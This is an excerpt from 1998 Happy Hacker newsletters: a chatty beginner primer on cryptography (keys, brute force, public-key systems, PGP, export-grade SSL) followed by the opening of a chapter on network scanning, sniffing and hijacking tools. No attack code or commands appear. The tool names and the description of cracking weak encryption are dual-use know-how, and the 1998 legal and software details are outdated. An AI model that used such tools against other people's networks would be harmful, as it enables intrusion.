tool. That is what makes the encryption of a message different for each person, because each person has a different key. So that's the part of the algorithm where the key "fits in." Get it? "Fits in?" Nevermind. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ D. How do you make a key? The way the key is generated is really super important. It's also the easiest part for you because the software you're using will do all that for you. Each crypto program will have different crazy ways of making its keys. Some of them tell you to swirl your mouse around and pound on your keyboard for a while. Why do you do this? The answer is simple: random data. You have to use as much random and unpredictable stuff as you possibly can. The reason for this is that if you use really predictable and non-random information like the date and your name to make a key, some attacker who wanted to read your encrypted email could guess what your key is really easily by playing with that kind of info until he had it right. If people can guess your stuff THAT easy, sheesh what's the point? That ain't real cryptography, it's kindergarten cryptography. You HAVE to have random numbers in a cryptosystem. ~~~~~~~~~~~~~~~~~~~ Head Exercise ~~~~~~~~~~~~~~~ Random numbers are tougher to come up with than you might think. Here's an example of what I'm talking about: Pretend for a second that your crypto program comes up with keys by taking the date, say 1-15-98, and multiplies it by 50 (011598 x 50 = 579900) and then randomly comes up with another number by multiplying two double digit numbers (like 36 x 73 = 2628 and then multiplies them all: 1523977200 is the result. That's 1011010110101100000101111110000 in binary form. Looks pretty random, huh? But it's not at ALL. A cryptanalyst can come along and take the output of all possible dates multiplied by 50 (there's only 365 numbers it could be), and then go through all those and multiply them by non-prime integers between 1000 and 9801 (there are only so many products of double digit numbers) and he will have your key before you can blink. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This is where we have more help from programmers. They write programs called "Random Number Generators." They're super high-tech programs way deep inside the key-making programs that use really strange stuff (like static) and weird things (like how you type) to come up with freaked-out numbers that NOBODY would have predicted. These Random Number Generators are often just called RNGs and are a real vital part of making a key. Always remember that the program for generating a key is one of the most intense and crucial parts of any cryptosystem. E. More crypto-history Okay, ciphers have evolved over the ages. A lot. There were disc ciphers that could rotate between alphabets, electrical ciphers that looked like typewriters but spat out ciphertext, and others. I have to skip over a lot of these for right now to get to other important stuff, but fear not - I'll cover more classical crypto stuff later on. IV. HOW THEY DO IT TODAY (or "Bigger isn't better") A. Keys are important still, but not the only thing. Today's ultra-modern crypto stuff is still based around making sure that the ciphertext can only be decrypted with that one special key. The keys you see these days are made up of strings of numbers, characters and stuff all broken down into digital form of 1s and 0s. The more numbers in the key, and the more random the info that makes it, the "stronger" the key is. Important thing: Having a big ol' humongous strong key doesn't necessarily mean you have a strong cryptosystem. Having a nice secure algorithm and a tiny weak little key also doesn't guarantee you a strong cryptosystem. Are you going "aroof" and scratching your head yet? Look at it this way. A strong algorithm is like knowing self-defense, and a big key is like having big muscles. Having big muscles doesn't mean you know how to defend yourself. And knowing how to defend yourself doesn't mean you're strong enough to. If you have the ability, then you use your big muscles to get the job of defending yourself done, but neither is any good without the other. *************************************************** Here's a good way to remember: Big Manly Key + Weak Wimpy Algorithm = Weak System Small Wimpy Key + Strong Manly Algorithm = Weak System Big Manly Key + Strong Manly Algorithm = Strong System Note: All apologies to the females in the audience, the word "manly" just had the vibe I was looking for. No offense intended :) *************************************************** Now I have to confuse you again, but all will be made clear. The big key and strong algorithm don't *guarantee* a strong system necessarily. Why? Well, it's always possible that YOU the user can mess everything up and make the whole dang thing insecure by trusting the wrong person with your key, not knowing who has access to your computer, setting crypto stuff up wrong, and just not being careful. Having big muscles and the knowledge to defend yourself won't make you safe if you happen to be drunk when attacked. But back to the whole "big key" thing: it doesn't really have anything to do with the guts of the algorithm that encrypts and decrypts your message. The algorithm just uses the key to do the job. The reason everyone's stuff after being put through the same algorithm looks different is because each time, the same algorithm is put into motion, but using a different key - one from each person. B. What's "brute forcing?" Making sure your key is nice and big just makes it harder to guess the key if you were going down the list of all possible keys. This is called a "brute force" attack. This means that if you have a six-digit number, you could crack the key by starting guessing it at 000001 then 000002 then 000003 on the way to 999999 till you get the key. A typical ATM pin number four digits long would be harder to "brute force" if it were ten numbers. The number of guesses you would have to go through to get the key increase hugely each time a number is added to a key, and your poor PC is worked overtime in the rush to figure out all the possible combinations. ~~~~~~~~~~~~~~~~~~~~~~~~ Head Exercise ~~~~~~~~~~~~~~~~~~~~~~~~ You can brute force a key of two digits in your head. Get a friend to think of a two-digit number, and not tell you. Easy to guess, right? There are only 99 numbers it could possibly be, so you count down the list till you guess the right one. Now tell your friend to add just one more teensy little digit, so they have a secret number with three digits. Now there are 999 possible numbers it could be. See? 999 may only have one more digit than 99, but it's more than ten times bigger. It gets ten times harder each time you add a digit. You can still try to guess it, but how high do you feel like counting? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ With modern keys of 4096 bits, brute forcing takes dang near forever and there's just more intelligent ways of doing it. This is why the brute force method of cracking a large key is the very last resort of any smart cryptanalyst (those are the guys that crack the crypto stuff, remember?). And if a key can ever be brute forced, that means it's reeeeaaaaalllllly weak. Unfortunately some cryptosystem engineers haven't figured out that a bigger key isn't necessarily a better system. For instance, the PCS phone carrier that I use advertised the safety of talking on their phones by saying that "Our phones are so friggin' secure that in order to break through their communications privacy you'd have to guess four trillion keys in less than a second! Hoo yah! We're all that!" They didn't use those actual words, but it was something like that. Anyway, you know by now that they were talking about a brute force attack. The problem is that they didn't really look at the rest of the actual cryptosystem they used. Then some really awesome hackers looked at the actual system and process they used to encrypt the communication (remember the "algorithm?") and found some mathematical flaws that would allow anyone with a little ingenuity and some common equipment to decrypt the phone call information. Needless to say I made fun of my PCS people forEVER after that. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Cool thing: That was an actual true story. The algorithm is called CMEA, and it is used in an awful lot of PCS phones that communicate using a certain kind of behavior (or "protocol"). Check out the hack at: http://www.counterpane.com/cmea.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ *************************************************** Other note: The president of Counterpane Systems that published the hack is Bruce Schneier and you're going to be hearing his name a lot. He wrote the ultimately vital cryptography book "Applied Cryptography." If you're really into cryptography you probably already have it, but I'll get into that later. *************************************************** So remember. A stupid cryptosystem that happens to use a key seven gazillion digits long is still a stupid cryptosystem. You might as well just write the message on a dang postcard in large letters and attach a big neon sign to it that reads "Private but unprotected data! Don't read! Please! You might have to take all my money! Aaaaaa!" C. What is "public key" supposed to mean? Easy. You know how the ciphers we've been talking about have a secret key that both encrypts AND decrypts the message? Public key systems have two different keys that each will do one of those things. ? Okay okay, hold on. First let's have a little "Words You Need To Know" update: A cryptosystem that uses the same key to encrypt and decrypt the data is called a "symmetrical cipher." The reason for that should be obvious: because the whole process thing is the same on either end, only reversed like a mirror image. That's why they use the word "symmetry." And you can guess what they call a system that has a different key for each purpose ... yeah, an "asymmetrical cipher" (Asymmetrical just means "not symmetrical") Other more ordinary words for these systems are "private key" or "secret key" crypto for symmetrical, and "public key" for asymmetrical. Okay, you got the terms lah dee dah yeehaw let's get on with it. The problem started when people got sick of having to go through the hassle of getting the great and powerful secret key back and forth between the senders and receivers and all that stuff. I mean, how many ways can you get a secret key to someone without an eavesdropper snatching it en route? Not many. So some guy at Bell Labs came up with the genius idea of a system that would generate two numbers based on a certain kind of mathematical problem. When one of the numbers was used to encrypt data, only the other number generated with it would decrypt it. Woa! It was expanded upon by some cryptographers in Britan, and then some guys at Stanford came up with an even better idea (not even knowing about the previous work!). I'll tell you about those people in a sec. So you would generate the two numbers you'd use as keys (called a key pair). Give everybody in the universe one of the keys, and keep the other one on a floppy disc in your ventilation duct or your underwear drawer or somewhere else really private. Anyone who encrypted a message to you with the key that you gave them would be making a ciphertext that nothing in the world could decrypt except the key you have hidden between your undies and your socks. Nowadays there are a few different systems that use this clever little scheme hiding in your underwear. You can imagine how popular it is, no need to sneak around slipping floppies under doors and all that irritating cloak and dagger stuff. You download and install the software, generate the keys, and start emailing people your public key. If somebody encrypts something with your public key, only your private key can decrypt it. When you want to email someone an encrypted message, you get their public key. If you encrypt a message with somebody else's public key, only their private key can decrypt it. Reeeeeeaaaallll simple. Little secret: about fourteen years before these guys invented this system, the US government was talking to military cryptodudes and the NSA about this same problem but with nuclear missile signaling systems. They wanted some way of getting encrypted messages to the missile's computers in a way that wouldn't give anybody else the chance to get the key. So the NSA is saying that they had public key stuff a while back. Here's some of the NSA info and also information on the web about the Bell Labs papers and British discoveries about Public Key crypto way back in like 1970: http://www.cesg.gov.uk/ellisint.htm http://jya.com/nsam-160.htm. D. What's a Diffie-Hellman and who's RSA? Check it out, those are just different kinds of systems and keys. Diffie-Hellman keys are generated using a specific method for public key crypto, and RSA keys are generated using a completely different method for public key crypto. The basic public key thing is the same, but the two systems come up with the keys in a different way and go about the crypto thing using different algorithms. Whitfield Diffie, Ralph Merkle and Martin Hellman independently thought up a great way of generating a key pair in 1976 using a really tripped out math problem called the "discrete logarithm" problem. I ain't even going near explaining that, it's gonna hafta wait. Then the next year, some more brainiacs named Ron Rivest, Adi Shamir and Leonard Adleman invented the RSA scheme that essentially does the same job but based on a different mathematical problem called the "Integer Factorization Problem." Again, not touchin' it with a ten-foot pole. I'll go into it later. Much later. So keys created using Diffie, Merkle and Hellman's method are still called "Diffie-Hellmans." In fact, the newer ones are getting more popular because they can be used for digital signatures and everything. RSA still does all this stuff too and also is a big huge company. Funny thing: The early public key discoveries made at Bell Labs and in Britain's crypto unit from 1970 through 1974 used these SAME math problems. Then the others came up with them later on out of nowhere without even seeing the older work. Freaky huh? _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don't email us about any crimes you have committed! And don't expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed. To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Tim "No Sinister Nickname" Skorick . You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _________________________________________________________ ____________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 8, Part 2 The Magical Mystical Crypto-Primer ____________________________________________________________ by Tim "No Sinister Nickname" Skorick V. WHAT'S THE EASIEST WAY TO GET INTO ALL THIS? (or "Phil Gets Paid") A. PGP and where to get it Awright, some of you cipherpunks knew this was coming. By far the easiest way to play around with cryptography is by getting your own free copy of PGP. PGP stands for "Pretty Good Privacy" and was created a while back by a real fun math teacher named Phil Zimmerman. It was only command-line-based, meaning you had to do those annoying dos-like commands and switches and all that and there's wasn't any windows-type point and click. They (him and his friends) finally came up with a windows version but then promptly sold the whole thing to a company called Network Associates. ~~~~~~~~~~~~~~~~~~~~~~~~ Go Get It! ~~~~~~~~~~~~~~~~~~~~~~~~ Go to http://bs.mit.edu:8001/pgp-form.html This is the Massachusetts Institute of Technology website where you can still get PGP version 5.0 for Windows. Now you could get the *new* PGP version 5.5 from http://www.nai.com/products/security/pgpfreeware.asp but that version will only let you send and get messages encrypted with a Diffie-Hellman key, and not an RSA key. If you want to play with both, you have to get the older freeware. Now either way, you're going to have to fill out a questionnaire at least promising that you're located in the USA and that you aren't going to email a copy of the software to "Bob the UnaHacker" in some terrorist country. I'm going to explain that in a little bit. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Okay, let me assume for the sake of easiness that you're going to be running PGP on some flavor of windows or possibly on a mac. Doesn't matter which, it'll work the same on most of them. 1. Install it on your computer. 2. When it asks you which key type you want to generate, start with Diffie-Hellman just for the heck of it. 3. When it asks you for the size of key you want, just pick the biggest (heck, ya might as well). 4. You then get to pound random data out of your keyboard and then watch this fun little animation thingy. 5. So it finishes. The first thing you'll notice is that they automatically give you the keys of just about everybody who has ever worked at or near PGP. No biggie. You're good to go with the cryptofun. A. Playing with PGP First things first: your clipboard is your friend. Oh yes, make friends with your clipboard. Verrrrrry important. Take him out to dinner, date his sister, tell him he's cool. You'll be using him quite a bit. What makes PGP so user-friendly isn't only that it works with all these different operating systems ... it also uses only the most idiotically simple parts of all these operating systems. You know what the "copy" and "paste" functions are on most computers, right? To "copy" you hit Ctrl-C and it writes stuff that you selected onto your clipboard, and "paste" is just Ctrl-V and it copies the stuff back onto your document wherever you want. Your clipboard is just the way-station, so where better to use encryption and decryption functions? So remember: 1. To mess with the data, get it onto your clipboard. 2. To look at what you did to it, move it from your clipboard onto a document somewhere. If you ever want to see what's on your clipboard at the moment, go to the PGP menu and select the thing that says "Launch Associated Viewer." The encryption fun goes like this: 1. Type some goofy simple little letter to yourself: Dear Tim, quit doing that with your eyes or they'll freeze that way. 2. Highlight all the text with your mouse. 3. Hit Ctrl-C. (it just copied the letter onto your clipboard) 4. Select from your PGP menu "Encrypt clipboard." 5. When it shows you all your public keys of people to write to, choose your own. 6. Drag and drop your name onto the "recipient" list. 7. Hit "ok." (it just encrypted everything on your clipboard but left the ciphertext there) 8. Go back to your document. 9. Click somewhere down below the plaintext you already typed. 10. Hit Ctrl-V to paste. SPLAT! 11. Look at that mess! -----BEGIN PGP MESSAGE----- Version: PGP for Personal Privacy 5.0 MessageID: B7gCHs7p6DU/TxZ7XFDbRklmHhdaWbBU qANQR1DBw04Djbfak/0G+g0QEACBqiGqyQEM8itHm0VGIvPovTWQwV27ARi/kScm Ffk+ekdHKelizo52sAzCN35+5JvO9F+rPTjgIOnDynhflfDoMc8sFJggrU+srXPR MQR6X53eOmYZOBQmXcg8GiVRgl+RyN1ZlqiKPV05Edl/UjueyE6koTeQRhbcUtRq BPLloA26jZcklJZu1lvPvkoAjxq+OuZKWNmlXQziTGMtTtgxDmtF7zZ6wZNCV652 CNGeIZVTMCC8ZAZ91lDq2qKq9fRzIVAyW0K0xMlMBMqTMhJCBScWr6iCCKnOwhFW OFRRByfOhX5bMiddET8SbL40Qfyc9lLG+xEGuOw6O5xMT5aQdWiSog4idrrBd61K KjUUglfeDFsni2lqGeUkt/nUcEnMhAApZoXxoKQ6wzZUipOxrMhWeQB8vLNTNmQc 5sPZEapLEioftjh9axL+lF2Z/9XAy0+UnUsjtw7OMhxyvhZWjjQNEko8OvaW7pL0 6eaXooE909ESkRKvkP2CATTVeTinXQk4kSH24SFwDaYxLDMJtGv88jOinKmBhOa0 c3UGKEfRliOgxqq18M6KdJtVOOLzTeiPuKmkwtgOXnt7ky7V1cy61kiBPWjme8Hs vt0VvFbKitU/dVjfdnrlMKJccG/PgYFYJ/9YM4M5XpSimMNxppLgFCbum3buVnn4 wP82aA//YRq9hkFblfdBk0bIrjOB11O5zo7MCabbkIm+xrQtVM7EZ1AV/OQw1QpM CvAOIHfq1THi3wWGIU9npMvDnelSsJRpWl2kde2tUDYZWELjSFjPofysFXd02fc2 yGFG+6Eb0a3WzFwSjwVfZUhmUVRGnOVK/WIz+jIAJq08mAUoq9lE7LUblpBgZb3l 4G5iGZ8H0yskYRzzXg5rPV3dV8fyo4pasbJ8tVnQBYZQ7t0MFdl0x/xqBm9fDevX vTf/atvWBF9+Vp9QepRmZ+ehATYe1N4VBknylhV4SRFar4Sja4BYWVVjYP/k1M6Q jkQ9jTmulHml317IH9HLdilri8cDosDX6n02QMD6lw/uiWs+ohpgLXuMCqbPLR1L 9y5Kbj2gTdlNUs/3b5RUXRDNjtjqVFpgscgQWNUseZ10P214L6I+lqAIh3qb5gdC FrKb82fvJdcFwQZtam9JHooyiG11OSRrahdMf2u8C0YWrfCKIDhLEwEaY3lHtk9P GumJu+9cF6z2hWovHHJ5lvWlwNNOtxohSGxV/3R8F41cQXnUPkPNLxqbYzlqzoZ1 z3Q6dyQ2gBbnjKiQm/VfDpPyKdvkWktl2iR2kyVyDwbP0u8NBQTsbkQ2r9yMPM/3 PHQoT8ME5q3FLOgSirV1YnNQCkTCfOHGb37ZtZlVQYN00gjJVCnJWr8bh9jD19yt YOvixVgaym2dwCk6e+GBxKtKJ5KgpULANG/tJbY8MZjpw7IyDK6lgo1wmnn4NSjG JIGLXn8rk44KbT2Qo3SzZftRf8Y+1i49QQ5eEdrFmxz1vg== =md+y -----END PGP MESSAGE----- WOW! That digital oatmeal looks cooler every time I make it. Heh heh heh. Now at the risk of sounding like Magnum P.I., I know what you're thinking. You're thinking "AAUUUGH! I put my letter through a blender! Oh the humanity!" Just calm down. Remember, it's moronic to encrypt messages that can't be decrypted (this doesn't go for some password protecting ideas and for "digital signatures," but those aren't really messages and we'll chit chat about that in the next primer). At first glance, for all we know, that mess up there might just be random garbage. Guess what? We can prove that it ain't. You wrote the letter to yourself and encrypted it with your own public key, didn't ya? You have your private key and can decrypt the message even easier than you encrypted it! Ha ha ha HA! Here's what ya do: 1. Highlight the entire ciphertext, from the beginning of the "-----BEGIN PGP.." to the end of the " END PGP MESSAGE-----" 2. Hit Ctrl-C to copy it onto your clipboard. (I know it was already there from last time but let's pretend you just got this particular blob sent to you from somebody else) 3. Go to wherever your PGP menu is and click on "Decrypt/Verify clipboard" and put in your passphrase when asked for it. (When you see the box that says "Decryption Successful," that means that it just decrypted the stuff on your clipboard but left it there) 4. Go to your original document and click down past the stuff you already put there. 5. Hit Ctrl-V to paste. 6. Voila! Dear Tim, quit doing that with your eyes or they'll freeze that way. Ta-DUM! Isn't this a momentous occasion? I think I'm misty-eyed ... A. Getting someone else's public key This is easy. You find the text version of their key on either a website or from a text file or email or whatever. I showed you part of mine, it looks a lot like the encrypted mess we just saw. 1. Highlight the whole thing again, from the beginning of the " -----BEGIN PGP PUBLIC KEY ... " to the end of the " ... --END PGP PUBLIC KEY BLOCK-----." 2. Then hit Ctrl-C to copy the key to your clipboard. 3. Now go to the PGP menu and just pick the option that says "Add Key from Clipboard." 4. You'll see a window open up telling you that PGP saw the key and knows what it is, and you hit the "import" button. Simple, huh? A. What PGP really does It's a plain and simple truth that most secret-key programs run way faster than public-key systems. So PGP makes the best of both worlds. When you encrypt a message to someone with PGP, it first compresses the message to make sure it won't take up a whole lot of space. It then makes its own little secret symmetric key (like from DES or something) and encrypts the text with that (really fast) symmetrical algorithm. After that, it takes the receiver's public key and encrypts just the secret DES-type key. Since it's only encrypting a key, it goes way quicker than if it were encrypting the whole message. The PGP message is both of these blobs of ciphertext all crammed together. When the receiver's PGP program gets the message, it uses the private key of the recipient to decrypt the secret key from the blob first (goes quickly cuz it's just a key). It then uses the symmetric key it just deciphered to decrypt the rest of the message from the blob quickly, and decompresses the message the rest of the way into readable form. V. OTHER WAYS TO START USING CRYPTO A. Secure your Netscape connection - Part One: Your browser COULD be secure: Dude, it suuuuuuuucks that people haven't done this more often yet. Check it out. If you have the right version, Netscape can connect to cooperating web sites in a really secure way. Try it, instead of typing "http://", type "https://". That tells your net machine to try to connect with the server using its "Secure Sockets Layer." That's the part of your browser that can encrypt everything going between you and the server you're surfing to. You know the little key type thingy in the lower corner of your browser? It usually has a slash through it or shows an open lock or something. This means you are wandering around the web making non-secure connections. If you hook up a secure connection using "https" to a web server, it will show a complete key, or a closed lock, or various other "locked" looking things. >Oooooooh! Aaaaaah!< If you don't see a change, or get a message saying "hey doofus, this isn't an https site," don't worry. Most websites aren't set up to let you connect securely, there's usually no reason to. You'll find the places with "https" addresses at online stores, banks, and other places where security would be needed. I mean, do you REALLY care how many people know you post to the Nine Inch Nails board seven hundred times a day? - Part Two: It probably ain't But even if you're connecting to a site that can do the whole secure thang, and even if you do connect and see the "locked" looking thing in the corner, you probably aren't any more secure than you were before. "Why" you ask? Cuz even then, the crypto connection that your browser is using is probably weak. - Part Three: Here's why it ain't Here's the skinny. Our U.S. government people consider crypto technology a weapon, because twenty years ago back in the cold war it was a dangerous thing for your enemy to have. The United States "Export Law" says that since it's considered a weapon, it's illegal to export out of the country. Why is it such a big freakin deal? Well, America has interests spread out all over the place, and we have spies who pay real close attention to what goes on all over the world, especially in terrorist countries. If terrorists start using strong crypto, we can't eavesdrop on them and maybe tell when they're gonna blow stuff up (Not that our spying on these people has kept them from blowing stuff up before now). Now before you get all in a frenzy, people have been trying to reach an agreement with our intelligence people for a while now.. There are a lot of bills in the House and the Senate trying to fix this, but no luck yet. I mean, heck, Congress has only been at it for about six years now, give em a little time ... So when you download a browser off the net, most people get stuck downloading what's called an "export-grade" web browser. That means one whose crypto stuff is weak enough for the government to feel okay about you exporting it. Don't buy anything off the web with those wimpy little browsers, cuz any cyber-moron that knows how to use a packet sniffer and a cracking utility can read your credit info that you buy stuff with. >Boooooo! Hissssss!< Part Four: Here's why that sucks Netscape can work with all the great crypto stuff out there through its Secure Sockets Layer but people are usually limited to 40-bit encryption stuff, which is really weak and super lame. Crypto stuff that weak has been cracked left and right. Heck, Bruce Schneier will even give you a SCREEN SAVER that can crack this type of encryption, and it even BRUTE FORCES IT!!!! Can you imagine how weak that is? Sheesh!! You can get it at http://www.counterpane.com/smime.html Part Five: Fix it! Help is here! >sound of trumpets< This super high-class software guy named Farrell McKay and some of his friends put together a little set of files called "Fortify" that you download right into your browser's home directory, run them, and they just strengthen the SNOT outta your browser. They pump it UP, my friends. Here's what you should do. First send me a million dollars. Then, go to the "Fortify" website at http://www.fortify.net/index.html. Then check what your connection security is for right now at the link that says "SSL checker" (Yes, that stands for "Secure Sockets Layer Checker"). It will tell whether or not your browser is set on "wimpy mode" or whether or not it can connect to a server in a safe way. It will even list all the different secure connections you could have along with what you actually have. If that page tells you that your connection is weak, go to the "download" page and get the version that's right for your computer (there isn't a version available for Macs yet). Stick the stuff in the directory that your browser is in and follow whatever other instructions there are. It's easy and really quick to do, and then you have to restart your browser. Now to check if it worked. Go back to the SSL checker at their site, you might have to hit reload. See what it says? Most versions should connect at a full 128-bit RC-4! Note: Remember the cryptogenius Ron Rivest who helped create RSA? RC-4 is one of his own special algorithms, and a sweet one at that. So, you can send and receive super-secret encrypted email that nobody can read, and you can connect with whopping 128-bit RC-4 to participating websites. This would be a good time to rub your hands together and cackle maniacally. Now I know you're hooked ... V. WRAP UP STUFF A. All that confuses is not crypto The biggest thing to keep in mind when you dig around for good crypto stuff to play with is this: Just because it has a fancy-schmancy name like "cryptographic module" and seems to screw up text real good doesn't mean that it is real cryptography. Even if it comes from a big name software company, it ain't necessarily worth your while. Real cryptography is incredibly difficult to make secure. Most of these companies churning out software packages that protect passwords and encrypt little documents and stuff don't bother with any kind of real work in that area. I won't even go into these wiseguys on the web and in hacker rags that write their own stuff and then try to sell you on it. Sheesh! Most of them have no idea what they're getting themselves into. Cryptography is just too tough and experts are few and far between. These warnings are covered a bit more in the web resources section later on. So ... B. Beware "kindergarten cryptography" Don't just take someone else's word for it. There are all kinds of interesting ideas floating around about new crypto stuff from people who only sound like they know what they're talking about. From hacker magazines, to newsgroup postings from alleged elite experts, to rave reviews in big computer magazines, everybody seems to know what crypto should be and where to find the good stuff. Ugh. It ain't the wares that the journalists rave about. It ain't the program that your favorite hacker writes. It ain't the impressive looking plug-in that your favorite software company tries to sell you. The "good stuff" is what survives the tests by the experts. Remember this: learn the names of the experts. Learn the names of the algorithms and cryptosystems. After a long, long, long time on the market and after a wayyyyy lot of tests, the algorithms and systems that live on are the good ones. And that's only for today. Breakthroughs in computing power have made more than one seemingly secure cryptosystem obsolete. Every algorithm that is untested or unreleased to the public, every algorithm that flies in the face of established mathematical law and number theory, every algorithm that claims to be great but isn't available to be proven is not cryptography, but kindergarten cryptography. Using kindergarten cryptography is even worse than using no cryptography at all. You know why kindergarten cryptography is so dangerous? Because it fools you into thinking it's cryptography, and you use it on private stuff that it isn't really going to protect. If you didn't try to use any crypto at all, at least you would know enough to save the private stuff for later and it would never be at risk! C. Words you get to throw around! Awright all you showoffs! You should be able to use all the words down there in quotes even if you can't necessarily give a total definition for some of them. Throw them around, get used to them. Better yet, use them in sentences - around your friends who don't know what they mean :) Yack away! You know that: "Cryptology" is made up of "Cryptography" (or "crypto") and "Cryptanalysis" and the guys that do that are "Cryptographers" and "Cryptanalysts." You know that the "Ceasar cipher" was an old way to "encipher" (or "encrypt") something and also to "decipher" (or "decrypt") something. Before you encrypt, the message is still "plaintext," and "ciphertext" is what it is when it's encrypted. A "substitution cipher" ain't the best "cryptosystem" anymore. "Algorithms" are step by step math processes, here's some: "RSA" "IDEA" "DES" "Blowfish" "CAST" "El Gamal" "RC-4" and they all HAVE to use a "key." "Binary" means made up of ones and zeros. A "passphrase" is a series of passwords. "Blocks" are chunks of text, "iterations" are separate encryption steps that your algorithm takes on the blocks. A "random number generator (RNG)" gives you good random numbers and nobody will "brute force" your key if it's big enough. "Protocol" means behavior. A "symmetrical cipher" is the same as "private key" crypto which is also called "secret key" crypto. These are the opposite of "asymmetrical ciphers" which are also known as "public key" crypto which you use a "key pair" for like "Diffie-Hellman" keys which are based on the "discrete logarithm problem" or "RSA keys" which are based on the "Integer Factorization Problem." If it's an asymmetrical cipher the "encryption algorithm" that turns plaintext into ciphertext is different from the "decryption algorithm" that turns ciphertext back into plaintext. "PGP" can use all these. "Secure Sockets Layer" is how your browser tries to use crypto but it's hampered by annoying "export law" that limits you to downloading "export-grade" encryption, which is weak. "Fortify" fixes that right up, and it ain't no "kindergarten cryptography." And - look way down at the last book suggestion - "steganography" is the art of hiding messages - usually encrypted ones - someplace where you wouldn't expect. V. WANNA LEARN MORE? A. Quick web stuff Real quick ways to get some more entry-level info, most are stuff in Acrobat format! 1. Go to the PGP user's manual that you downloaded with the software and thumb through to about page 81 in the manual for version 5.0, page 77 in version 5.5's manual. That has a great section on crypto stuff. If you're not sure where on your computer it is, go to the directory you put PGP in. Open the folders till you come to one with a bunch of files in it, and there should be a document there with a .pdf extension. That's it. 2. Hit RSA's website at http://www.rsa.com/rsalabs/newfaq/ and download their world famous cryptography FAQ. It's stellar. 3. Let's keep our learning well-rounded, go to Bruce Schneier's Counterpane website for two VERY important essays on understanding what cryptography, privacy and security are all about. They're both downloadable: "Why Cryptography Is Harder Than It Looks" http://www.counterpane.com/whycrypto.pdf.zip "Security Pitfalls in Cryptography" http://www.counterpane.com/pitfalls.pdf.zip A. Books to look for "Applied Cryptography" Second Edition by Bruce Schneier, John Wiley & Sons, 1996 This is hands-down the best place for you newer crypto people to start really digging in. Bruce wrote this book in plain English (but it has been translated into others too!), explaining everything really clearly. It's sometimes really funny and always easy to read. The book just covers everything. Absolutely everything. The price is a little hefty, but it's a big book and has the source code in C in the back for all you programmers who wanna start tinkering with programming crypto. Check out some more reviews, alternate language versions and other info at Bruce's site http://www.counterpane.com/applied.html "Handbook of Applied Cryptography" by Alfred Menezes, CRC Press, 1996 This one is a little tougher to find, but it's a really sweet layout of the math and algebra stuff underneath a lot of the secrets that make crypto strong. There's a big treat here, too. It talks about using crypto in places like the banking industry and in alarm systems and all manner of neato environments. It also has a lot of newer information about things happening in the crypto world lately. Look at the info and also a couple of chapters in Acrobat format at: http://www.dms.auburn.edu/hac/ "Decrypted Secrets" by F. L. Bauer, Springer Verlag, 1997 This one is a doozy. This was written from a really technical, but also historical perspective. Just don't let the columns of numbers and figures freak you out too bad at first. Some people might have trouble wading through all the math and number theory stuff, but you will be rewarded when you do. There are a ton of stories from history, like spies and wars and stuff since way back when. All of these stories are fascinating to read and are used to make you better understand why the basic rules of using crypto are the way they are. They show this by telling you all the funny ways that crypto people have screwed up in the past, and also by highlighting some of the smarter minds that made the really huge breakthroughs and discoveries. "Disappearing Cryptography" by Peter Wayner, Ap Professional, April 1996 This book is a little trippy. It deals more with some of the high-level privacy philosophy involved, and lays it out in a very interesting, if strange, way. Each section has a real simple description of what it talks about, followed by more technical math descriptions and then a programming example. Good to have, even though it deals more with hiding cryptography (a practice called "steganography") than it does with actual cryptography. _______________________________________________________________________ Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org. We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. So don't email us about any crimes you have committed! And don't expect us to come to your rescue if you crash 100 million computers with some new Java virus you just unleashed. To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message. Copyright 1998 Tim "No Sinister Nickname" Skorick . You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end. _________________________________________________________ ___________________________________________________________ GUIDE TO (mostly) HARMLESS HACKING Vol. 3 No. 9, Part 1 War Tools! Scan, Sniff, Spoof and Hijack ____________________________________________________________ This Guide is excerpted from the Second Edition of “The Happy Hacker” book, available Sept. 31 1998. “Hello, I don’t mean to be rude, but I noticed you were examining something, er... proprietary on our system. Would you mind explaining what you were doing?” Sigh. From time to time I get an email like that. Sometimes it is less polite than this. In this case, I had been examining an intranet server. For some reason it was directly accessible from the Internet instead of being on a private internal network. I’ll bet you can’t reach that box from the Internet any more:) I was just curious, not trying to break in! The one thing that defines a hacker is curiosity: a blinding, insatiable hunger for more, more, more information. If your objective is to fight those who attack your computers, your curiosity will be your greatest asset. This chapter covers some powerful war tools that can satisfy your curiosity in a legal and constructive way -- and shows how to use them to battle computer criminals. Sysadmins tell me that it is far harder to keep people out of your computer systems than it is to break in. In this chapter we will get a glimpse of this war between sysadmins and computer intruders, and learn something about the tools they both use. ******************* In this chapter you will learn about: IP address scanning Port scanning a beginner’s scanner a stealth scanner How to give intruders a hard time Nuke Nabber (for casual users) Port Dumper (for anyone with a sense of humor) RotoRouter (drive the bad guys nuts) Sniffit TCPview TTY-Watcher (great fun for casual users, great tool for sysadmins) Industrial strength tools Etherpeek IP-Watcher T-sight **************** ********************************* You can get punched in the nose warning: Before you start playing with the techniques of this chapter, beware. If you use what you learn here for snooping on other people’s networks, you should expect them to suspect you of being a computer criminal. For this reason, if you want to explore other people’s systems, it helps to make friends with the staff 